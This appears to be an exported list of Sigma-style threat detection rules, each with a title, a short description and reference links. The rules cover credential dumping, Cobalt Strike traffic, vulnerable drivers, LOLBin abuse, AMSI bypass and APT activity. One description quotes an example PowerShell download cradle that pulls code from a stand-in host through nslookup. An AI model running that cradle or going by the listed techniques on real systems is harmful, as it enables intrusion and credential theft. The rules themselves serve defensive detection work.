App Permissions Granted For Other APIs |
Detects when app permissions (app roles) for other APIs are granted |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions |
Edit of .bash_profile and .bashrc |
Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. |
MITRE Attack technique T1156; .bash_profile and .bashrc. |
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.
SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.
Microsoft Azure, and Microsoft Operations Management Suite.
|
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
User Added To Admin Group - MacOS |
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/dscl.html, https://ss64.com/osx/sysadminctl.html |
Brute Force |
Detects many authentication failures from one source to one destination which is may indicate Brute Force activity |
None |
Domestic Kitten FurBall Malware Pattern |
Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group |
https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ |
CobaltStrike Malleable Amazon Browsing Traffic Profile |
Detects Malleable Amazon Profile |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100 |
CobaltStrike Malformed UAs in Malleable Profiles |
Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike |
https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ |
CobaltStrike Malleable (OCSP) Profile |
Detects Malleable (OCSP) Profile with Typo (OSCP) in URL |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile |
CobaltStrike Malleable OneDrive Browsing Traffic Profile |
Detects Malleable OneDrive Profile |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile |
iOS Implant URL Pattern |
Detects URL pattern used by iOS Implant |
https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html, https://twitter.com/craiu/status/1167358457344925696 |
Search-ms and WebDAV Suspicious Indicators in URL |
Detects URL pattern used by search(-ms)/WebDAV initial access campaigns. |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 |
Suspicious Remote Thread Target |
Offensive tradecraft is switching away from using APIs like "CreateRemoteThread", however, this is still largely observed in the wild.
This rule aims to detect suspicious processes (those we would not expect to behave in this way like winword.exe or outlook.exe) creating remote threads on other processes.
It is a generalistic rule, but it should have a low FP ratio due to the selected range of processes.
|
https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
Credential Dumping Tools Service Execution |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Usage Of Malicious POORTRY Signed Driver |
Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. |
https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware |
PowerShell Scripts Run by a Services |
Detects powershell script installed as a Service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Vulnerable AVAST Anti Rootkit Driver Load |
Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products |
https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ |
Vulnerable Dell BIOS Update Driver Load |
Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 |
https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ |
Vulnerable Driver Load By Name |
Detects the load of known vulnerable drivers via their names only. |
https://loldrivers.io/ |
Vulnerable GIGABYTE Driver Load |
Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation |
https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b, https://twitter.com/malmoeb/status/1551449425842786306, https://github.com/fengjixuchui/gdrv-loader, https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details, https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details |
Vulnerable HW Driver Load |
Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation |
https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/, https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details |
Vulnerable Lenovo Driver Load |
Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges |
https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities, https://github.com/alfarom256/CVE-2022-3699/ |
Suspicious File Event With Teams Objects |
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. |
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Suspicious Unattend.xml File Access |
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.
If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
CrackMapExec File Creation Patterns |
Detects suspicious file creation patterns found in logs when CrackMapExec is used |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass |
LSASS Memory Dump File Creation |
LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
CreateMiniDump Hacktool |
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
Mimikatz MemSSP Default Log File Creation |
Detects Mimikatz MemSSP default log file creation |
https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ |
Alternate PowerShell Hosts - Image |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html |
Suspicious CLR Logs Creation |
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly. |
https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml |
Suspicious Load of Advapi31.dll |
Detects the load of advapi31.dll by a process running in an uncommon folder |
https://github.com/hlldz/Phant0m |
SCM DLL Sideload |
Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system |
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 |
Svchost DLL Search Order Hijack |
Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system
IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\Windows\System32\ by default.
An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services "svchost.exe -k netsvcs" to gain code execution on a remote machine.
|
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 |
Possible Process Hollowing Image Loading |
Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz |
https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html |
Windows Management Instrumentation DLL Loaded Via Microsoft Word |
Detects DLL's Loaded Via Word Containing VBA Macros Executing WMI Commands |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16, https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/, https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf |
Microsoft Binary Github Communication |
Detects an executable in the Windows folder accessing github.com |
https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 |
Suspicious Non-Browser Network Communication With Reddit API |
Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2 |
https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al |
Suspicious Epmap Connection |
Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) |
https://github.com/RiccardoAncarani/TaskShell/ |
PsExec Pipes Artifacts |
Detecting use PsExec via Pipe Creation/Access to pipes |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Netcat The Powershell Version - PowerShell Module |
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md |
Accessing Encrypted Credentials from Google Chrome Login Database |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
Web browsers typically store the credentials in an encrypted format within a credential store.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
AzureHound PowerShell Commands |
Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound |
https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html |
Execution via CL_Invocation.ps1 - Powershell |
Detects Execution via SyncInvoke in CL_Invocation.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
Execution via CL_Mutexverifiers.ps1 |
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600 |
Powershell File and Directory Discovery |
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,
including whether or not the adversary fully infects the target and/or attempts specific actions.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
Dnscat Execution |
Dnscat exfiltration tool execution |
None |
PrintNightmare Powershell Exploitation |
Detects Commandlet name for PrintNightmare exploitation. |
https://github.com/calebstewart/CVE-2021-1675 |
Suspicious Get-WmiObject |
The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers |
https://attack.mitre.org/datasources/DS0005/, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Suspicious PowerShell Download |
Detects suspicious PowerShell download command |
None |
Suspicious PowerShell Invocations - Generic |
Detects suspicious PowerShell invocation command parameters |
None |
Suspicious PowerShell Invocations - Specific |
Detects suspicious PowerShell invocation command parameters |
None |
SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Suspicious In-Memory Module Execution |
Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space.
An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way),
it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory.
Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that
most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries.
The latter should also be considered suspicious.
|
https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ |
Credential Dumping by LaZagne |
Detects LSASS process access by LaZagne for credential dumping. |
https://twitter.com/bh4b3sh/status/1303674603819081728 |
Credential Dumping Tools Accessing LSASS Memory |
Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools |
https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Credential Dumping by Pypykatz |
Detects LSASS process access by pypykatz for credential dumping. |
https://github.com/skelsec/pypykatz |
Potential NT API Stub Patching |
Detects potential NT API stub patching as seen used by the project PatchingAPI |
https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch, https://twitter.com/D1rkMtr/status/1611471891193298944?s=20 |
APT29 |
This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. |
https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html |
CrackMapExecWin |
Detects CrackMapExecWin Activity as Described by NCSC |
https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control, https://attack.mitre.org/software/S0488/ |
GALLIUM Artefacts |
Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) |
Suspicious Certutil Command Usage |
Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code |
https://twitter.com/JohnLaTwC/status/835149808817991680, https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/, https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Hurricane Panda Activity |
Detects Hurricane Panda Activity |
https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ |
Lazarus Activity Apr21 |
Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity |
https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ |
Lazarus Loaders |
Detects different loaders as described in various threat reports on Lazarus group activity |
https://www.hvs-consulting.de/lazarus-report/, https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ |
DNS Tunnel Technique from MuddyWater |
Detecting DNS tunnel activity for Muddywater actor |
https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/, https://www.vmray.com/analyses/5ad401c3a568/report/overview.html |
TA505 Dropper Load Pattern |
Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents |
https://twitter.com/ForensicITGuy/status/1334734244120309760 |
Read and Execute a File Via Cmd.exe |
Detect use of "/R <" to read and execute a file via cmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md |
Cmd Stream Redirection |
Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt |
Credential Acquisition via Registry Hive Dumping |
Detects Credential Acquisition via Registry Hive Dumping |
https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html |
Visual Basic Script Execution |
Adversaries may abuse Visual Basic (VB) for execution |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md |
Execution via MSSQL Xp_cmdshell Stored Procedure |
Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. |
https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html |
Indirect Command Exectuion via Forfiles |
Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a, https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ |
Indirect Command Execution |
Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md, https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html |
Invoke-Obfuscation RUNDLL LAUNCHER |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
New Lolbin Process by Office Applications |
This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set |
Monitoring Wuauclt.exe For Lolbas Execution Of DLL |
Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. |
https://dtm.uk/wuauclt/ |
Abusing Findstr for Defense Evasion |
Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism |
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Suspicious File Download Using Office Application |
Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
Execute MSDT.EXE Using Diagcab File |
Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 |
https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd |
Ryuk Ransomware Command Line Activity |
Detects Ryuk Ransomware command lines |
https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ |
MavInject Process Injection |
Detects process injection using the signed Windows tool Mavinject32.exe |
https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152 |
Process Memory Dumped Via RdrLeakDiag.EXE |
Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ |
Trickbot Malware Reconnaissance Activity |
Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. |
https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
New Service Creation |
Detects creation of a new service. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Nslookup PwSh Download Cradle |
This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] |
https://twitter.com/alh4zr3d/status/1566489367232651264 |
Application Whitelisting Bypass via DLL Loaded by odbcconf.exe |
Detects defence evasion attempt via odbcconf.exe execution to load DLL |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://twitter.com/Hexacorn/status/1187143326673330176, https://redcanary.com/blog/raspberry-robin/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca |
Excel Proxy Executing Regsvr32 With Payload |
Excel called wmic to finally proxy execute regsvr32 with the payload.
An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
|
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Excel Proxy Executing Regsvr32 With Payload Alternate |
Excel called wmic to finally proxy execute regsvr32 with the payload.
An attacker wanted to break suspicious parent-child chain (Office app spawns LOLBin).
But we have command-line in the event which allow us to "restore" this suspicious parent-child chain and detect it.
Monitor process creation with "wmic process call create" and LOLBins in command-line with parent Office application processes.
|
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Office Applications Spawning Wmi Cli Alternate |
Initial execution of malicious document calls wmic to execute the file with regsvr32 |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Possible Applocker Bypass |
Detects execution of executables that can be used to bypass Applocker whitelisting |
https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt, https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md |
PowerShell AMSI Bypass Pattern |
Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. |
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ |
Base64 Encoded Listing of Shadowcopy |
Detects base64 encoded listing Win32_Shadowcopy |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar |
Malicious Base64 Encoded Powershell Invoke Cmdlets |
Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Potential PowerShell Base64 Encoded Shellcode |
Detects potential powershell Base64 encoded Shellcode |
https://twitter.com/cyb3rops/status/1063072865992523776 |
Suspicious Bitsadmin Job via PowerShell |
Detect download by BITS jobs via PowerShell |
https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
Stop Or Remove Antivirus Service |
Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.
Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ |
Potential Xor Encoded PowerShell Command |
Detects usage of "xor" or "bxor" in combination of a "foreach" loop. This pattern is often found in encoded powershell code and commands as a way to avoid detection |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 |
Regsvr32 Anomaly |
Detects various anomalies in relation to regsvr32.exe |
https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Registry Dump of SAM Creds and Secrets |
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets |
Renamed PaExec Execution |
Detects execution of renamed paexec via imphash and executable product string |
sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf |
Renamed PsExec |
Detects the execution of a renamed PsExec often used by attackers or malware |
https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks |
Renamed PowerShell |
Detects the execution of a renamed PowerShell often used by attackers or malware |
https://twitter.com/christophetd/status/1164506034720952320 |
Renamed Rundll32.exe Execution |
Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection |
https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ |
Root Certificate Installed |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Rundll32 JS RunHTMLApplication Pattern |
Detects suspicious command line patterns used when rundll32 is used to run JavaScript code |
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt |
Suspicious Rundll32 Script in CommandLine |
Detects suspicious process related to rundll32 based on arguments |
https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md |
Run from a Zip File |
Payloads may be compressed, archived, or encrypted in order to avoid detection |
